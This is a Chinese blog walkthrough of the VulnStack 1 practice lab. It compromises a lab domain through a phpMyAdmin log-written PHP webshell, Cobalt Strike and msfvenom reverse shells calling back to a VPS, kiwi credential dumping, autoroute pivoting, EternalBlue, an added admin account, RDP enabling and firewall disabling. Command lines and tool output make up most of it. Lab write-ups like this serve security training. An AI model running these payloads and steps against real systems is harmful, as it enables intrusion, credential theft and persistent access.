Err0r233


Err0r233的个人博客

VulnStack 1

  • ~7.19K 字
  • 次阅读

也是终于做了这个vulnstack靶场的测试了:(

不过市面上还是很多人做了这个的,简单的操作学习一下吧

环境配置

三台机子:

1
2
3
win7 公网机 192.168.239.128 内网ip 192.168.52.143 密码hongrisec@2019
windows 2003 192.168.52.141 密码HONGRISEC@2019 域控
windows 2008 192.168.52.138 密码HONGRISEC@2019

公网机利用phpstudy开启了公网服务,公网访问192.168.64.128

外网

发现的是一个php探针,这里测试一下mysql:

这里用户名密码都是root,连接正常

利用dirsearch收集信息:

发现了phpmyadmin,这里找一下phpmyadmin的漏洞利用

1
show variables like '%secure_file%';

查找有无权限

这里权限是null,无法直接写shell

利用日志写shell:

开启general_log后系统将mysql以后执行的每一条查询语句写入你指定位置的文件夹里:

1
2
set global general_log = "ON";
set global general_log_file = "C:/phpStudy/WWW/1.php"

我这里直接将phpstudy解压到了C盘,所以路径就是C:/WWW/1.php

然后select "<?php eval($_POST['cmd']);?>"

访问一下1.php

我这里第一次翻车了,所以写到2.php

蚁剑连接:

成功拿到shell,这边没有yxcms的路线,所以暂且不和大家写这一条线的

cs上线

上线一下cobalt strike:

这边利用vps创一个teamserver然后cs连接:

1
./teamserver ip 123456

windows上用cobaltstrike.bat,生成一个powershell的payload:

这样就能生成了

这里填一下自己的vps,然后powershell执行一下:

shell弹过来了:

右键,选择会话交互,sleep 0,然后执行命令:

权限提升:需要创建另一个监听器,这边选择开启了6001端口

右键shell凭证提权即可,成功获取到SYSTEM权限的shell:

这里dumphash和logonpassword就出了win7的密码:

横向移动

1
net view

确认域控:

1
net group "domain controllers" /domain

确认域中的账户:

1
net group "domain users" /domain

确认域管:

1
net group "domain admins" /domain

用psexec打域控:

直接梭了

其实这里我应该也把win7的密码改成HONGRISEC@2019的,让他们的密码一致,毕竟Adminstrator是域管

上线cs:

后面还会有msf的打法,先休息了(

msf打法

这边用msf制作一个shell:

1
msfvenom -p windows/meterpreter/reverse_tcp lhost=ip lport=2333 -f exe -o shell.exe

msf监听:

1
2
3
4
5
6
7
8
9
10
11
msf6 > use exploit/multi/handler 
[*] Using configured payload generic/shell_reverse_tcp
msf6 exploit(multi/handler) > set payload windows/meterpreter/reverse_tcp
payload => windows/meterpreter/reverse_tcp
msf6 exploit(multi/handler) > set lhost 0.0.0.0
lhost => 0.0.0.0
msf6 exploit(multi/handler) > set lport 2333
lport => 2333
msf6 exploit(multi/handler) > run

[*] Started reverse TCP handler on 0.0.0.0:2333

然后用蚁剑传上去执行:

shell就弹过来了:

这边可以将msf的shell派生给cs:

msf派生cs

用2333端口的监听器,然后meterpreter:

1
2
3
4
5
6
7
8
background
use exploit/windows/local/payload_inject
set payload windows/meterpreter/reverse_http
set DisablePayloadHandler true
set lhost vps_ip
set lport 2333
set session 1
run

注意这里要用ip而不是0.0.0.0,而且要用reverse_http

否则就弹不过来

接下来的流程就和cs的一样了,net view扫内网然后按上面的流程打

这边就不展开,接着用msf打:

1
net view

这里就不像cs能直接扫到内网的ip了

查的结果很抽象

这里还是先提权:

msf可以直接getsystem,exit回到meterpreter,然后直接getsystem

再回shell,已经是system权限了

导出密码:

1
2
load kiwi
creds_all

发现不行:

这里有可能是因为32位的kiwi在64位的机子上运行了

别急,重新起一个x64的windows shell试试:

1
msfvenom -p windows/x64/meterpreter/reverse_tcp lhost=106.52.94.23 lport=2333 -f exe -o shell2.exe

重新监听之后就好了

这里再额外讲一下meterpreter迁移:

meterpreter迁移

其实是将meterpreter迁移到稳定的进程去,防止运行的shell被突然关掉

这里利用ps查询进程

然后getpid查询meterpreter本身的进程号:

接下来找到一个稳定的进程,例如explorer.exe

输入

1
migrate 3348

刚刚session挂了,重新放一张成功的

成功迁移到了explorer.exe了

横向移动

这边在蚁剑ipconfig找网段:

发现了52网段

传一个fscan,扫一下:

1
fscan64.exe -h 192.168.52.1-255

目录下result.txt生成结果:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
192.168.52.138:445 open
192.168.52.138:139 open
192.168.52.138:88 open
192.168.52.141:7001 open
192.168.52.143:3306 open
192.168.52.141:445 open
192.168.52.138:135 open
192.168.52.143:445 open
192.168.52.141:139 open
192.168.52.141:135 open
192.168.52.143:139 open
192.168.52.143:135 open
192.168.52.138:80 open
192.168.52.143:80 open
192.168.52.141:21 open
192.168.52.141:7002 open
192.168.52.141:8098 open
192.168.52.141:8099 open
[*] NetInfo:
[*]192.168.52.143
   [->]stu1
   [->]192.168.52.143
   [->]192.168.239.128
   [->]169.254.129.186
[+] 192.168.52.143	MS17-010	(Windows 7 Professional 7601 Service Pack 1)
[+] 192.168.52.138	MS17-010	(Windows Server 2008 R2 Datacenter 7601 Service Pack 1)
[*] NetInfo:
[*]192.168.52.141
   [->]root-tvi862ubeh
   [->]192.168.52.141
[*] NetBios: 192.168.52.143  stu1.god.org                        Windows 7 Professional 7601 Service Pack 1 
[*] WebTitle: http://192.168.52.138     code:200 len:689    title:IIS7
[+] 192.168.52.141	MS17-010	(Windows Server 2003 3790)
[*] NetInfo:
[*]192.168.52.138
   [->]owa
   [->]192.168.52.138
[*] WebTitle: http://192.168.52.141:8099 code:403 len:1409   title:The page must be viewed over a secure channel
[*] WebTitle: http://192.168.52.141:7002 code:200 len:2632   title:Sentinel Keys License Monitor
[*] NetBios: 192.168.52.138  [+]DC owa.god.org                   Windows Server 2008 R2 Datacenter 7601 Service Pack 1 
[*] WebTitle: http://192.168.52.143     code:200 len:14731  title:phpStudy 探针 2014
[+] ftp://192.168.52.141:21:anonymous

筛掉这个靶机的.143

另外找到了192.168.52.141192.168.52.138

建立52段的路由:

1
2
run autoroute -s 192.168.52.0/24
run autoroute -p #查看路由状态

看端口情况:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
192.168.52.138:445 open
192.168.52.138:139 open
192.168.52.138:88 open
192.168.52.138:135 open
192.168.52.138:80 open

192.168.52.141:7001 open
192.168.52.141:445 open
192.168.52.141:139 open
192.168.52.141:135 open
192.168.52.141:21 open
192.168.52.141:7002 open
192.168.52.141:8098 open
192.168.52.141:8099 open

都开了445,用永恒之蓝爆了

这边先开公网服务的3389

1
2
3
4
5
6
7
#开3389
REG ADD HKLM\SYSTEM\CurrentControlSet\Control\Terminal" "Server /v fDenyTSConnections /t REG_DWORD /d 00000000 /f

REG ADD HKLM\\SYSTEM\\CurrentControlSet\\Control\\Terminal\" \"Server /v fDenyTSConnections /t REG_DWORD /d 0 /f

#关闭3389
REG ADD HKLM\SYSTEM\CurrentControlSet\Control\Terminal" "Server /v fDenyTSConnections /t REG_DWORD /d 11111111 /f

meterpreter执行:

1
run post/windows/manage/enable_rdp

添加一下管理员:

1
2
3
net user err0r hongrisec@2019 /add
net localgroup administrators err0r /add
net user err0r

远程桌面连一下:

1
2
err0r
hongrisec@2019

或者

1
2
GOD\Administrator
HONGRISEC@2019

就好了

接下来就是拿永恒之蓝爆剩下的服务

Administrator

拿下

141:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
background
msf6 auxiliary(scanner/smb/smb_ms17_010) > use exploit/windows/smb/ms17_010_eternalblue 
[*] No payload configured, defaulting to windows/x64/meterpreter/reverse_tcp
msf6 exploit(windows/smb/ms17_010_eternalblue) > set lhost 106.52.94.23
lhost => 106.52.94.23
msf6 exploit(windows/smb/ms17_010_eternalblue) > set lport 6001
lport => 6001
msf6 exploit(windows/smb/ms17_010_eternalblue) > set RHOST 192.168.52.141
RHOST => 192.168.52.141
msf6 exploit(windows/smb/ms17_010_eternalblue) > exploit 

[-] Handler failed to bind to 106.52.94.23:6001:-  -
[*] Started reverse TCP handler on 0.0.0.0:6001 
[*] 192.168.52.141:445 - Using auxiliary/scanner/smb/smb_ms17_010 as check
[+] 192.168.52.141:445    - Host is likely VULNERABLE to MS17-010! - Windows Server 2003 3790 x86 (32-bit)
[*] 192.168.52.141:445    - Scanned 1 of 1 hosts (100% complete)
[+] 192.168.52.141:445 - The target is vulnerable.
[-] 192.168.52.141:445 - Exploit aborted due to failure: no-target: This module only supports x64 (64-bit) targets
[*] Exploit completed, but no session was created.

执行失败,不能用64位的

换个方式打:

1
2
3
4
use auxiliary/admin/smb/ms17_010_command
set rhost 192.168.52.141
set rport 445
run

返回了nt authority\system,拿下system权限。这里只能一条命令一条命令输入

开3389

1
set command REG ADD HKLM\\SYSTEM\\CurrentControlSet\\Control\\Terminal\" \"Server /v fDenyTSConnections /t REG_DWORD /d 0 /f

fscan看到已经开了3389了,用刚刚公网的连一下:

拿下

同样的操作拿下138的机子:

这边还得关下防火墙:

1
set command netsh advfirewall set allprofiles state off

关掉防火墙之后就可以连上3389了

至此全部拿下

本作品采用 知识共享署名-相同方式共享 4.0 国际许可协议 进行许可